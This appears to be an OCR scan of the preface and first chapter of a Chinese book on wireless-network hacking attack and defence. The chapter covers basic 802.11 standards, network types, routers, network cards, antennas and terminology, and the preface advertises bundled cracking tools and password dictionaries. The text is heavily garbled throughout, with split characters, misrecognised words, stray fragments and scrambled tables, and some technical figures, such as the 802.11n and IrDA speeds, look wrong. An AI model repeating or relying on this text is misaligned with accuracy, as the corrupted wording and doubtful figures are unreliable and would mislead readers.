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一 -一 一 
有 避 


目前 ， 无 线 网 络 安全 问题 日 益 突 出 。“ 工 欲 善 其 事 必 先 利 其 器 ”， 只 有 选择 合适 的 攻 
防 工具 ， 才 能 起 到 事半功倍 的 作用 。 本 书 除 了 讲解 有 线 端的 攻防 策略 外 ， 还 把 目前 市 场 上 
流行 的 无 线 攻 防 等 热点 融入 书 中 。 


本 书 特色 


知识 丰富 全 面 : 涵盖 了 所 有 黑客 攻防 知识 点 ， 由 浅 入 深 地 介绍 黑客 攻防 方面 的 技能 。 
图 文 并 茂 : 注重 操作 ， 图 文 并 成 ， 在 介绍 案例 的 过 程 中 ， 每 一 个 操作 均 有 对 应 的 插 
图 。 这 种 图 文 结合 的 方式 便于 读者 在 学 习 中 直观 、 清 晰 地 看 到 操作 的 过 程 以 及 效果 ， 从 而 
能 更 快 地 理解 和 掌握 。 
案例 丰富 : 把 知识 点 融 汇 于 系统 的 案例 实 训 当中 ， 并 且 结 合 经 典 案例 进行 讲解 和 拓 
展 ， 进 而 达到 “ 知 其 然 ， 并 知 其 所 以 然 ” 的 效果 。 
提示 技巧 ， 贴 心 周到 : 本 书 对 读者 在 学 习 过 程 中 可 能 遇 到 的 疑难 问题 以 “提示 ”的 形 
式 进行 说 明 ， 以 免 读 者 在 学 习 过 程 中 走 弯 路 。 
本 书 赠送 资源 
同步 微 视频 。 
精美 教学 PPT 课 件 。 
CDlinux 系 统 文件 包 。 
Kali 虚 拟 机 镜像 文件 。 
无 线 密码 的 字典 文件 。 
黑客 工具 (107 个 ) 速 查 电 子 书 。 国生 
常用 黑客 命令 〈160 个 ) 速 查 电子 书 。 os 
180 页 常见 故障 维修 电子 书 。 er 
Windows 10 系 统 使 用 和 防护 技巧 电子 书 。 
8 大 经 典 密码 破解 工具 电子 书 。 
加 密 与 解密 技术 快速 入 门 小 白 电 子 书 。 
网 站 入 侵 与 黑客 脚本 编程 电子 书 。 
黑客 命令 全 方位 详解 电子 书 。 
读者 可 扫描 右 方 二 维 码 获 取 本 书 赠 送 资源 。 
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读者 对 象 


本 书 不 仅 适 合 网 络 安全 从 业 人 员 及 网 络 管理 员 ， 而 且 适 合 广大 网 络 爱 好 者 ， 也 可 作为 
大 、 中 专 院 校 相关 专业 的 参考 书 。 


写作 团队 


本 书 由 长 期 研究 网 络 安全 的 网 络 安全 技术 联盟 编 善 ， 另 外 还 有 王 秀 英 、 王 喘 英 、 刘 玉 
萍 、 刘 尧 、 王 杀 采 、 王 攀登 、 王 婷 婷 、 张 芳 、 李 小 威 、 王 猛 、 王 维 维 、 李 佳 康 、 王 秀 荣 、 
王 天 护 、 皮 素 六 等 人 参与 了 编写 工作 。 在 编写 过 程 中 ， 编 者 们 尽 所 能 地 将 最 好 的 讲解 呈现 
给 读者 ， 但 也 难免 有 玖 漏 和 不 受 之 处 ， 冤 请 不 音 指正 。 硅 您 在 学 习 中 遇 到 困难 或 疑问 ， 或 
有 何 建 议 ， 可 通过 电子 邮件 zhangmin2@tup.tsinghua.edu.cn 与 我 们 联系 。 
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第 1 革 ”无 线 网 络 快速 入 [| 


无 线 网 络 ， 特 别 是 无 线 局 域 网 给 我 们 的 生活 带 来 了 极 大 的 方便 ， 为 我 们 提供 了 无 处 不 


在 的 、 
定性 ， 且 容易 受到 黑客 的 攻击 ， 从 而 大 大 景 
基础 常 第 


1.1 什么 是 无 线 网 络 


无 线 网 络 (Wireless network) 是 采用 
无 线 通 信 技 术 实 现 的 网 络 ， 与 有 线 网 络 的 
用 途 十 分 类 似 ， 最 大 的 不 同 在 于 传输 媒介 
的 不 同 ， 一 般 来 说 ， 无 线 网 络 可 以 分 为 狭 
义 无 线 网 络 和 广义 无 线 网 络 两 种 。 


1.1.1 狭义 无 线 网 络 

狭义 无 线 网 络 就 是 我 们 常 说 的 无 线 局 
域 网 ， 是 基于 802.11b/g/n 标 准 的 WLAN 无 线 
局 域 网 ， 具 有 可 移动 性 、 安 装 简单 、 高 灵 
活性 和 高 扩展 能 力 等 特点 ， 作 为 对 传统 有 
线 网 络 的 延伸 ， 这 种 无 线 网 络 在 许多 特殊 
环境 中 得 到 了 广泛 地 应 用 ， 如 企业 内 部 、 
学 校内 部 、 家 庭 等 。 这 种 网 络 的 缺点 是 覆 
盖 范 围 小 ， 使 用 距离 在 5~30m 内 。 

随 着 无 线 数据 网 络 解决 方案 的 不 断 推 
出 ， 全 球 WiFi 设 备 迅 猛 增 长 ， 相 信和 在 不 久 
的 将 来 ，“ 不 论 在 任何 时 间 、 任 何 地 点 都 
可 以 轻松 上 网 ”这 一 目标 就 会 被 实现 ， 下 
面 介 绍 一 些 有 关 无 线 网 络 的 概念 


1. 无 线 网 络 的 起 源 


无 线 网 络 的 起 源 ， 可 以 人 奶 渊 到 第 二 
次 世界 大 战 期 间 ， 当 时 美 盏 采用 无 线 电 信 
号 作 资 料 的 传输 ， 他 们 研发 出 了 一 套 无 
线 电 传输 技术 ， 并 且 采 用 相当 高 强度 的 加 
密 技术 。 当 时 美军 和 盟 军 都 广泛 使 用 这 项 
技术 。 


高 带宽 的 网 络 服务 ， 但 是 ， 由 于 无 线 信道 特有 的 性 质 ， 使 得 无 线 网 络 连 接 具 有 不 稳 
吕 响 了 服务 质量 ， 本 章 介 绍 一 些 有 关 无 线 网 络 的 


无 线 电 传输 技术 让 许多 学 者 得 到 了 有 灵 
感 ， 在 1971 年 时 ， 夏 威 夷 大 学 (University 
of Hawaii) 的 研究 员 创 造 了 第 一 个 基于 
封包 式 技术 的 无 线 电 通信 和 网络， 被 称 作 
ALOHNET 网 络 ， 这 可 以 算是 相当 早期 的 无 
线 局 域 网 络 (WLAN) 了 。 最 早 的 WLAN 
包括 了 7 台 计 算 机 ， 它 们 采用 双 癌 星 型 拓扑 


(bi-directional star Whalney, ， po 四 座 上 上 a 


可 说 是 正式 诞生 了 。 下 图 为 一 个 星 型 拓扑 


结构 示意 图 。 

口 
~ 
mi 2 
山 吴 


2. IEEE 802.11 标 准 


IEEE 802.11 标 准 第 一 个 版 本 发 表 于 
1997 年 ， 其 中 定义 了 介质 访问 接 入 控制 层 
(MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 
在 2.4GHz 的 ISM 频 段 上 的 两 种 无 线 调频 方 
式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 速 


CC 


| 
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率 设 计 为 2Mb/s。 两 个 设备 之 间 的 通信 可 以 以 自由 直接 (ad hoc) 的 方式 进行 ， 也 可 以 在 
基站 (Base Station，BS) 或 者 访问 点 (Access Point，AP) 的 协调 下 进行 。 

对 于 无 线 网 络 重要 发 展 标准 ， 用 户 有 必要 了 解 一 下 IEEE 802.11 标 准 的 发 展 过 程 ， 具 
体内 容 见 下 表 。 


标 准 
IEEE 802.11 
IEEE 802.11a 
IEEE 802.11b 
IEEE 802.11c 
IEEE 802.11d 
IEEE 802.1le 
IEEE 802.11f 
IEEE 802.11g 
IEEE 802.11h 


IEEE 802.111 


IEEE 802.11n 


IEEE 802.11p 


表 802.11 标 准 的 发 展 史 
说 明 

1997 年 ， 原 始 标准 (2Mb/s， 工 作 在 2.4GHz) 
1999 年 ， 物 理 层 补充 (54Mb/s， 工 作 在 SGHz) 
1999 年 ， 物 理 层 补充 (11Mb/s 工 作 在 2.4GHz) 
符合 802.1D 的 媒体 接 入 控制 层 桥接 (MAC Layer Bridging) 
根据 各 国 无 线 电 规 定做 的 调整 
对 服务 等 级 (Quality of Service.QoS) 的 支持 
基站 的 互 连 性 (IAPPInter-Access Point Protocol) ，2006 年 2 月 被 EEE 批 准 撤销 
2003 年 ， 物 理 层 补充 (54Mb/s， 工 作 在 2.4GHz) 
2004 年 ， 无 线 覆盖 半径 的 调整 ， 室 内 (indoor) 和 室外 (outdoor) 信道 (5GHz 频 段 ) 
2004 年 ， 无 线 网 络 的 安全 方面 的 补充 


2009 年 9 月 通过 正式 标准 ，WLAN 的 传输 速率 由 802.11a 及 802.11g 提 供 的 54Mb/s、108Mb/s， 提 高 至 
350Mb/s 甚 至 高 达 475Mb/s 


2010 年 ， 这 个 协定 主要 用 在 车 用 电子 的 无 线 通 信 上 


目前 ， 无 线 网 络 及 设备 主要 使 用 的 是 
IEEE 802.llb/gmm 标 准 ， 尤 其 以 IEEE 802.llg 
最 为 普及 ， 不 过 IEEE 802.lln 正 在 以 飞快 的 
速度 赶 超 。 

除了 上 面 的 IEEE 标 准 ， 另 外 有 一 个 被 
称 为 IEEE 802.11b+ 的 技术 ， 通 过 PBCC 技 术 
(packet binary convolutional code) 在 IEEE 
802.11b 〈2.4GHz 频 段 ) 基础 上 提供 22MPbys 
的 数据 传输 速率 。 但 这 事实 上 并 不 是 一 个 
IEEE 的 公开 标准 ， 而 是 一 项 产权 私有 的 
技术 。 


3. WiFi 联 盟 


WiFi 联 盟 成 立 于 1999 年 ， 是 一 家 全 球 
及 非 营 利 性 的 行业 协会 ， 拥 有 几 百 家 企业 
会 员 ， 致 力 解决 符合 IEEE 802.11 标 准 的 产 
品 的 生产 和 设备 兼容 性 问题 ， 从 而 推动 无 
线 局 域 网 产业 的 发 展 ， 以 增强 移动 无 线 、 


便携 、 移 动 和 家 用 设备 的 用 户 体 验 为 目 
标 。 自 2003 年 3 月 WiFi 联 盟 开展 此 项 认证 以 
来 ， 已 经 有 超过 4000 多 种 产品 获得 了 WiFi 
GERTIFIED 指 定 认 证 标志 ， 有 力 地 推动 了 
WiFi 产 品 和 服务 在 消费 者 市 场 和 企业 市 场 
两 方面 的 全 面 开展 。 

WiFi 联 盟 认证 标志 就 是 无 线 技术 支持 
的 象征 ， 被 广泛 应 用 在 智能 手机 、 平 板 计算 
机 、 笔 记 本 计算 机 和 各 种 便携 式 设 备 上 。 


4. 无 线 网 络 的 组 成 


无 线 网 络 由 以 下 几 个 部 分 组 成 。 

(1) 站 点 〈Station) 。 网 络 最 基本 的 组 
成 部 分 ， 通 常 指 的 就 是 无 线 客 户 端 。 

(2) 基本 服务 单元 (Basic Service Set， 
BSS) 。 网 络 最 基本 的 服务 单元 。 最 简单 的 
服务 单元 可 以 只 由 两 个 无 线 客户 端 组 成 ， 
客户 端 可 以 动态 地 连接 (Associate) 到 基本 


服务 单元 中 。 

(3) 分 配 系 统 (Distribution System， 
DS) 。 分 配 系 统 用 于 连接 不 同 的 基本 服务 
单元 ， 分 配 系 统 使 用 的 媒介 逻辑 上 和 基本 
服务 单元 使 用 的 媒介 是 截然 分 开 的 ， 尽 管 
它们 物理 上 可 能 会 是 同一 个 媒介 ， 例 如 同 
一 个 无 线 频 道 。 

(4) 接 入 点 (Access Point，AP) 。 无 
线 接 入 点 既 有 普通 有 线 接 入 点 的 能 力 ， 又 
有 接 入 到 上 一 层 网 络 的 能 力 。 其 实 AP 和 无 
线路 由 器 是 有 区 别 的 ， 相 比 来 说 ， 无 线路 
由 器 的 功能 更 多 ， 不 过 在 基本 功能 方面 ， 
两 者 并 无 实质 性 的 区 别 ， 所 以 在 实际 应 用 
中 ， 都 会 将 无 线路 由 器 称 为 AP。 

(5) 扩展 服务 单元 (Extended Service 
Set，ESS) 。 由 分 配 系统 和 基本 服务 单元 
组 合 而 成 。 这 种 组 合 是 逻辑 上 的 ， 并 非 物 
理 上 的 ， 不 同 的 基本 服务 单元 有 可 能 在 地 
理 位 置 上 相差 甚 远 。 分 配 系 统 也 可 以 使 用 
各 种 各 样 的 技术 。 

(6) 关口 (Portal) 。 用 于 将 无 线 局 域 
网 和 有 线 局 域 网 或 其 他 网 络 联系 起 来 ， 是 
一 个 逻辑 成 分 。 

以 上 组 成 部 分 使 用 了 3 种 媒介 ， 站 点 
使 用 的 无 线 媒 介 ， 分 配 系统 使 用 的 媒介 ， 
以 及 和 无 线 局 域 网 集成 一 起 的 其 他 局 域 网 
使 用 的 媒介 ， 物 理 上 它们 可 能 相互 重 登 。 
IEEE 802.11 只 负责 在 站 点 使 用 的 无 线 媒介 
上 寻找 地 址 ， 分 配 系 统 和 其 他 局 域 网 的 寻 
址 不 属于 无 线 局 域 网 的 范围 。 


5. 无 线 网 络 的 运行 原理 


要 想 建 立 一 个 有 效 运 行 的 无 线 网 络 ， 
首先 需要 至 少 一 个 AP， 如 无 线路 由 器 ， 然 
后 是 至 少 一 个 无 线 客户 端 ， 即 装 有 无 线 网 
卡 的 便携 式 设备 ， 如 计算 机 、 手 机 、 平 板 
计算 机 等 。 硬 件 准 备 完成 后 ，AP 每 100mas 
将 SSID 信 号 封包 广播 一 次 ， 无 线 客 户 端 
可 以 借 此 决定 是 否 要 和 这 一 个 SSID 的 AP 
连接 ， 使 用 者 还 可 以 设 定 要 连接 到 哪 一 个 
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SSID。 这 就 好 比 用 户 使 用 智能 手机 连接 周 
边 的 WiFi 一 样 ， 可 以 有 选择 地 进行 连接 。 
不 过 ，WiFi 系 统 总 是 对 客户 端 开放 其 连接 
标准 ， 并 文 持 漫游 ， 这 是 WiFi 的 优点 。 


1.1.2 厂 义 无 线 网 络 


广义 无 线 网 络 主要 包含 3 个 方面 ， 分 别 


是 WPAN、WLAN 和 WWAN， 下 面 分别 进 
行 介绍 


1. WPAN 


WPAN (Wireless Personal Area Net- 
work， 无 线 个 人 局 域 网 通信 技术 ) 即 第 
说 的 无 线 个 人 局 域 网 。 无 线 个 人 局 域 网 
(WPAN) 是 一 种 采用 无 线 连接 的 个 人 局 域 
网 。 它 被 用 在 诺 如 电话 、 计 算 机 、 附 属 设 
备 以 及 小 范围 (个 人 局 域 网 的 工作 范围 一 
般 是 在 10m 以 内 ) 内 的 数字 助理 设备 之 间 的 
通信 。 

无 线 个 人 局 域 网 (WPAN) 是 一 种 
与 无 线 广域网 (WWAN) 、 无 线 局 域 网 
(WLAN) 并 列 但 禾 兰 范围 相对 较 小 的 
无 线 网 络 。 在 网 络 构成 上 ，WPAN 位 于 整 
个 网 络 链 的 末端 ， 用 于 实现 同一 地 点 终端 
与 终端 间 的 连接 ， 如 连接 手机 和 蓝牙 耳机 
等 ，WPAN 设 备 具 有 价格 便宜 、 体 积 小 、 
易 操 作 和 功 耗 低 等 优点 。 

支持 无 线 个 人 局 域 网 的 技术 包括 : 蓝 
牙 、ZigBee、 超 频 波 段 (UWB) 、IDA、 
HomeRF 等 ， 其 中 蓝牙 技术 在 无 线 个 人 局 域 
网 中 使 用 最 广泛 ， 下 面 就 来 介绍 几 种 主要 
的 技术 。 

e 蓝牙 (Bluetooth) : 蓝牙 是 一 种 短 

距离 无 线 通 信 技 术 ， 它 可 以 用 于 在 
较 小 的 范围 内 通过 无 线 连接 的 方式 
实现 固定 设备 或 移动 设备 之 间 的 网 
络 互联 ， 从 而 在 各 种 数字 设备 之 间 
实现 灵活 、 安 全 、 低 动 耗 、 低 成 本 
的 语音 和 数据 通信 。 

蓝牙 技术 的 一 般 有 效 通 信和 范围 为 10m， 
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强 的 可 以 达到 100m 左 右 ， 其 最 高 速率 可 达 
1Mb/s。 其 传输 使 用 的 功 耗 很 低 ， 广 泛 应 用 
于 无 线 设 备 ， 如 平板 计算 机 、 手 机 、 智 能 
话 等 领域 。 下 图 为 一 个 智能 手机 的 监 牙 设置 
界面 ， 在 其 中 可 以 开启 与 关闭 蓝牙 。 


蓝牙 


ol。 


设备 名 称 HUAWEI MAIMANG 5 
接收 的 文件 
可 用 设备 

E8:E1:BC:3C:1F:30 


没有 搜索 到 目标 设备 ? 查看 可 能 原因 


e IDA (红外 ) : IDA 是 红外 数据 组 
织 (Infrared Data Association) 的 简 
称 ， 目 前 广泛 采用 的 IDA 红 外 连接 
技术 就 是 由 该 组 织 提 出 的 ， 到 目前 
为 止 ， 全 球 采 用 IrDA 技 术 的 设备 超 
过 了 5000 万 部 。 

IrDA 技 术 的 主要 特点 有 : 利用 红外 
传输 数据 ， 无 须 专门 申请 特定 频段 的 使 用 
执照 ; 设备 体积 小 、 功 率 低 ; 由 于 采用 点 
到 点 的 连接 方式 ， 数 据 传输 受到 的 干扰 较 
小 ， 数 据 传 输 速率 高 ， 可 达 l1Gb/s。 但 存在 
一 定 的 技术 缺陷 ， 如 受 视 距 影响 其 传输 距 
离 短 、 要 求 通 信 设 备 的 位 置 固 定 、 其 点 对 
点 的 传输 连接 无 法 灵活 地 组 成 网 络 等 。 


2. WLAN 


WLAN (Wireless Local Area Networks， 无 线 
局 域 网 ) 即 上 面 所 说 的 “狭义 无 线 网 络 ”， 
具体 请 参考 上 面 狭义 无 线 网 络 的 内 容 。 


3. WWAN 


WWAN (Wireless Wide Area Network, 
无 线 广域网 通信 技术 ) 即 常 说 的 无 线 广 域 
网 。WWAN 技 术 是 使 得 笔记 本 计算 机 或 
者 其 他 的 设备 装置 在 蜂 贸 网 络 履 盖 范 围 内 
可 以 在 任何 地 方 连接 到 互联 网 。 目 前 全 球 
的 无 线 广域网 络 主要 采用 GSM 及 CDMA 技 
术 ， 其 他 还 有 3G 或 者 4G 等 技术 。 

简单 地 说 ，WWAN 指 的 就 是 通过 通 
信 设 备 和 通信 网 络 来 上 网 ， 不 管 是 以 前 的 
GSM、EDGE 和 CDMA， 还 是 现在 的 3G、 
4G 网 络 ， 只 要 用 计算 机 中 的 PC 卡 装 SIM 
卡 ， 或 者 把 手机 连 在 笔记 本 计算 机 上 当 作 
Modem 连 网 ， 都 叫 WWAN。 


认识 无 线路 由 合 


无 线路 由 器 是 应 用 于 用 户 上 网 、 带 有 
无 线 覆 盖 功 能 的 路 由 器 ， 它 和 有 线路 由 器 
的 作用 是 一 样 的 ， 唯 一 的 不 同 就 是 无 线路 由 
器 的 顶部 或 者 尾部 多 了 一 个 或 者 几 个 天 线 ， 
其 作用 就 是 提供 无 线 网 络 的 支持 。 除 此 以 
外 ， 其 他 无 论 是 外 观 ， 或 者 是 内 在 配置 页 面 
都 和 同 款 型 的 有 线路 由 器 一 模 一 样 。 

市 面 上 每 一 个 厂商 的 无 线 产 品 都 有 
自己 的 特点 ， 下 图 为 美 版 思科 Linksys 
WRT1900AC 双 频 无 线路 由 器 ， 该 路 由 器 具 
有 4 个 天 线 ， 支 持 用 户 根 据 需 要 对 天 线 进行 
拆卸 和 换 装 ， 非 常 方便 。 另 外 ， 该 路 由 器 
支持 802.11b/g 协 议 ， 其 特点 是 使 用 多 个 无 
线 来 分 工 进行 无 线 数据 的 接收 与 发 送 。 


1 .2 


目前 ， 市 场 占有 率 比 较 高 的 无 线路 由 
器 是 TP-LINK， 其 性 价 比 比较 高 。 下 图 为 
TP-LINK 千 兆 无 线路 由 器 ， 具 有 高 速 双 核 、 
覆盖 更 远 、 家 长 控制 、 一 键 禁用 等 功能 。 


厂商 名 称 
Linksys 〈 领 势 ) 
D-LINK ( 友 讯 ) 
TP-LINK ( 普 联 ) 
Netgear (网 件 ) 
ASUS (华硕 ) 
Tenda (腾达) 


MERCURY (水 星 ) 


1.3 “了解 无 线 网 卡 


对 于 初次 接触 无 线 网 络 的 用 户 来 说 ， 
无 线 网 卡 与 无 线 上 网 卡 是 有 些 迷 惑 的 ， 本 
节 束 来 介绍 什么 是 无 线 网 卡 ， 什 么 是 无 线 
上 网 卡 。 


1.3.1 无 线 网 卡 


无 线 网 卡 是 终端 无 线 网 络 设 备 ， 是 不 
通过 有 线 连 接 ， 采 用 无 线 信 号 进行 数据 传 
输 的 终端 ， 有 时 也 被 称 为 WiFi 卡 ， 根 据 
接口 类 型 的 不 同 ， 主 要 有 PCMCIA 无 线 网 
卡 、PCI 无 线 网 卡 、Mini-PCI 无 线 网 卡 、 
USB 无 线 网 卡 、CF/SD 无 线 网 卡 几 类 。 

PCI 无 线 网 卡 : 主要 用 于 台式 计算 机 
中 ， 下 图 为 TP-LINK 出 品 的 PCI 无 线 网 卡 。 


官方 网 站 
性 价 比较 高 ， 市 场 占有 率 较 高 
wwwmercurycom comen | 价格 较 高 ， 性 能 比较 稳定 


WWW.INeICUIYCOIMm.com.cn 
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为 方便 大 家 选 购 无 线路 由 器 ， 下 面 
把 目前 市 面 上 第 见 的 无 线 设 备 广 商 列 举 出 
来 ， 包 括 厂商 名 称 、 官 方 网 站 以 及 个 人 建 
议 等 信息 见 下 表 。 


个 人 建议 


PCMCIA 无 线 网 卡 ， 主要 用 于 笔记 本 计 
算 机 中 ， 下 图 为 Linksys 出 品 的 PCMCIA 无 
线 网 卡 。 


USB 无 线 网 卡 : 这 种 网 卡 不 管 是 台子 
机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 ， 下 图 为 LB-LINK 出 品 
的 USB 无 线 网 卡 。 
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Mini-PCI 无 线 网 卡 : Mini-PCI 为 内 置 型 
无 线 网 卡 ， 被 广泛 应 用 于 笔记 本 计算 机 之 
中 ， 其 优点 是 无 须 占 用 PC 卡 或 USB 插 槽 ， 
并 且 免 去 了 随时 随身 携 一 张 PC 卡 或 USB 卡 
的 麻烦 。 

这 几 种 无 线 网 卡 在 价格 上 差距 不 大 ， 
在 性 能 和 功能 上 也 差不多 ， 用 户 可 根据 自 
己 的 需要 来 选择 。 在 距离 上 来 说 ， 无 线 网 
卡 是 依靠 接收 附近 无 线 网 络 信 号 来 上 网 
的 ， 这 个 信号 源 不 能 离 得 太 远 ， 一 般 无 线 
网 卡 是 配合 无 线路 由 器 来 使 用 的 ， 使 用 距 
离 在 5~30m 内 。 


史册 1.3.2 无 线 上 网 卡 


无 线 上 网 卡 指 的 是 无 线 广域网 卡 ， 是 依 


。 靠 接 收 无 线 宽带 运营 商 在 公共 场所 发 出 的 网 


络 信号 来 上 网 的 ， 这 个 信号 源 可 以 离 无 线 上 
网 的 计算 机 很 远 ， 如 联通 的 CDMA1IX 上 网 
卡 、 移 动 的 GPRS 无 线 上 网 卡 、 电 信 的 EVDO 


无 线 上 网 卡 的 作用 于 功能 相当 于 有 线 的 


站 缚 地 调制解调器 ， 也 就 是 我 们 俗称 的 “ 猫 ”， 它 


可 以 在 拥有 无 线 信 号 覆盖 的 任何 地 方 ， 利 用 
无 线 上 网 卡 来 连接 到 互联 网 上 。 从 理论 上 
来 讲 ， 假 如 你 购买 了 移动 的 无 线 上 网 卡 ， 
那么 在 有 移动 基站 信号 履 盖 的 地 方 都 可 以 
进行 无 线 上 网 。 

一 般 来 讲 ， 无 线 上 网 卡 的 信号 强度 
要 比 有 线 网 卡 差 一 些 ， 但 也 能 满足 一 些 基 
础 的 网 络 应 用 ， 如 浏览 网 页 、 收 发 邮件 、 
网 络 聊天 等 。 不 过 ， 随 着 无 线 网 络 技术 发 
展 ， 尤 其 是 现在 的 EVDO、TD-CDMA 等 
3G/4G 技 术 的 出 现 ， 使 得 无 线 上 网 速度 大 大 
提升 。 下 图 为 中 国电 信 推 出 的 天 导 4G 无 线 
上 网 卡 。 


无 线 上 网 卡 一 般 只 针对 笔记 本 计算 机 
用 户 ， 常 用 的 接口 类 型 为 USB 接 口 ， 但 也 
有 PCMCIA 接 口 类 型 的 ， 下 图 为 中 兴 的 4G 
无 线 上 网 卡 ， 作 为 硬件 ， 一 般 在 用 户 购买 
无 线 上 网 套餐 的 时 候 ， 运 营 商 会 赠送 无 线 
上 网 卡 。 


1.4 了 解 天 线 


无 线 局 域 网 中 的 天 线 可 以 扩展 无 线 网 
络 的 上 覆 凑 范围 ， 天 线 有 多 种 类 型 ， 根 据 方 
加 性 的 不 同 ， 天 线 分 为 全 同和 定 癌 两 种 。 


1.4.1 全 向 天 线 


全 加 天 线 ， 即 在 水 平方 向 上 表现 为 
360” 均 匀 辐 射 ， 也 就 是 平常 所 说 的 无 方 
向 性 ， 在 垂直 方向 上 表现 为 有 一 定 宽度 的 
波束 ， 一 般 情况 下 波 办 宽度 越 小 ， 增 益 越 
大 。 全 同 天 线 在 移动 通信 系统 中 一 般 应 用 
于 郊 县 大 区 制 的 站 型 ， 和 覆盖 范围 大 。 下 图 
为 连接 在 无 线 网 卡 上 的 全 同 天 线 。 


室内 全 同 天 线 适 合 于 无 线路 由 器 、AP 
这 样 的 需要 广泛 履 兰 信号 的 设备 上 ， 它 可 
以 将 信号 均匀 分 布 在 中 心 所 周围 360” 全 方 
位 区 域 ， 适 用 于 连接 点 距离 较 近 ， 分 布 角 
度 范围 大 ， 且 数量 较 多 的 情况 ， 如 无 线路 
由 胡 上 的 天 线 ， 束 是 室内 全 同 天 线 。 下 图 
为 目前 常见 的 无 线路 由 器 形状 。 


那么 简单 地 讲 ， 全 向 天 线 就 相当 于 以 
天 线 为 圆心 ， 其 传输 距离 为 半径 ， 画 一 个 
圆 ， 这 个 圆 内 就 是 无 线 信号 的 履 羡 范围 ， 
一 般 来 说 ， 在 实际 应 用 过 程 中 ， 半 径 多 为 
10 一 30m， 这 也 是 为 什么 能 在 街道 探测 到 那 
些 穿 出 墙壁 的 路 由 器 信号 的 原因 之 一 。 

如 果 将 全 同 天 线 安 装 在 户外 ， 则 必须 
安装 在 大 楼 顶端 或 高 处 ， 并 且 位 于 信号 禾 
新区 的 中 央 位 置 ， 以 便于 其 他 指向 性 天 线 
装置 通信 ， 构 成 单 点 对 多 点 的 星 型 拓扑 。 


1.4.2 ”定向 天 线 


定 回 天线 ， 在 水 平方 同上 表现 为 一 
定 角度 范围 辐射 ， 也 就 是 平常 所 说 的 有 方 
同性 。 同 全 同 天 线 一 样 ， 波 办 宽度 越 小 ， 
增益 越 大 。 定 同 天 线 在 通信 系统 中 一 般 应 
用 于 通信 距离 远 ， 履 盖 范 围 小 ， 目 标 密度 
大 ， 频 率 利用 率 高 的 环境 。 

定 同 天 线 有 各 种 不 同 的 款式 与 形状 ， 
如 Patch 天 线 、Panel 天 线 和 八木 天 线 等 ， 经 
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常用 于 无 线 区 域 网 络 中 短 距离 的 桥接 ， 例 
如 ， 跨 马路 的 两 栋 大 楼 ， 或 者 空间 扩展 的 
厂房 、 仓 库 等 。 

用 户 也 可 以 按 以 下 方式 来 思考 全 同 天 
线 和 定 同 天 线 之 间 的 关系 : 全 加 天 线 会 
四 面 八方 发 射 信 号 ， 前 后 左右 都 可 以 接收 
到 信和 号， 定 同 天 线 就 好 像 在 天 线 后 面 音 一 
个 硕 状 的 反射 面 ， 信 号 只 能 辐 前 面 传递 ， 
射 回 后 面 的 信号 被 反射 面 挡 住 并 反射 到 前 
方 ， 加 强 了 前 面 的 信号 强度 ， 可 以 想象 定 
器 天 线 的 主要 辐射 范围 像 一 个 倒立 的 不 太 
完整 的 圆锥 。 

此 外 ， 还 有 专门 用 于 长 距离 通信 的 高 
方 问 性 天 线 ， 有 极 罕 的 波束 宽度 和 很 高 的 
增益 值 ， 也 被 称 为 高 增益 指向 性 天 线 ， 如 
人 碟 形 天 线 和 格 状 天 线 ， 通 常用 于 后 对 扩 的 
通信 连接 ， 传 输 距 离 高 达 40km。 因 为 波束 
非常 罕 ， 因 此 天 线 彼 此 之 间 必 须要 很 精准 
地 瞄准 ， 而 且 天 线 之 间 的 直 视 必须 没有 任 
何 阻碍 物 。 

通过 上 文 能 够 形象 地 认识 到 什么 是 全 
器 天 线 ， 什 么 是 定 同 天 线 ， 那 么 在 实际 应 
用 时 该 注意 些 什 么 呢 ? 如 果 需 要 满足 多 个 站 
点 ， 并 且 这 些 站 氮 是 分 布 在 AP 的 不 同方 同 
时 ， 需 要 采用 全 问 天 线 ; 如 果 集 中 在 一 个 
方 回 ， 建 议 采 用 定 同 天 线 ; 男 外 还 要 考虑 
天 线 的 接头 形式 是 否 和 AP 匹配 、 天 线 的 增 
蔓 大 小 等 是 否 符合 目 己 的 需求 。 

对 于 室外 天 线 ， 在 安装 的 过 程 中 ， 天 
线 与 无 线 AP 之 间 需 要 增加 防 雷 设备 ， 定 问 
天 线 要 注意 天 线 的 正面 朝向 远 端 站 点 的 方 


向 ， 天 线 应 该 安装 在 尽 可 能 高 的 位 置 ， 天 晓 册 如 
线 和 站 点 之 间 尽 可 能 满足 视 距 ， 即 肉眼 可 猎 壤 呈 


见 ， 中 间 避 开 障 碍 。 


1.5 ”熟悉 无 线 网 络 的 术语 


下 面 是 无 线 网 络 安全 中 常会 涉及 的 基 


本 术语 ， 了 解 这 些 术 语 ， 可 以 帮助 用 户 更 
好 地 维护 无 线 网 络 安全 。 
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(1) WiFi。WiFi 是 一 种 允许 电子 设备 
连接 到 一 个 无 线 局 域 网 (WLAN) 的 技 
术 ， 通 常 使 用 2.4G UHF 或 SG SHF ISM 射 
频频 段 。 连 接 到 无 线 局 域 网 通常 是 有 密码 
保护 的 ; 但 也 可 是 开放 的 ， 这 样 就 允许 在 
WLAN 范围 内 的 任何 设备 可 以 连接 上 。 

(2) SSID。SSID (Service Set Identi- 
fier， 服 务 集 标识 符 ) 技术 可 以 将 一 个 无 
线 局 域 网 分 为 几 个 需要 不 同 身 份 验证 的 子 
网 络 ， 每 一 个 子 网 络 都 需要 独立 的 身份 验 
证 ， 只 有 通过 身份 验证 的 用 户 才 可 以 进入 
相应 的 子 网 络 ， 防 止 未 被 授权 的 用 户 进 入 
本 网 络 。SSID 可 以 是 任何 字符 ， 最 大 长 度 
为 32 个 字符 。 

(3) WAP。WAP (Wireless Application 
Protocol， 无 线 应 用 协议 ) 是 一 项 全 球 性 的 
网 络 通 信 协 议 。 它 使 移动 Internet 有 了 一 个 
通行 的 标准 ， 其 目标 是 将 Internet 的 丰富 信 
息 及 先进 的 业务 引入 到 移动 电话 等 无 线 终 
端 之 中 。 

(4) AP。Wireless Access Point， 无 线 
访问 接 入 点 。AP 就 是 传统 有 线 网 络 中 的 
Hub， 也 是 组 建 小 型 无 线 局 域 网 时 最 常用 的 
设备 。AP 相当 于 一 个 连接 有 线 网 和 无 线 网 
的 桥梁 ， 其 主要 作用 是 将 各 个 无 线 网 络 客 
户 站 连接 到 一 起 ， 然 后 将 无 线 网 络 接 入 以 
太 网 。 


($5) WEP。WEP (Wired Equivalent Pri- 
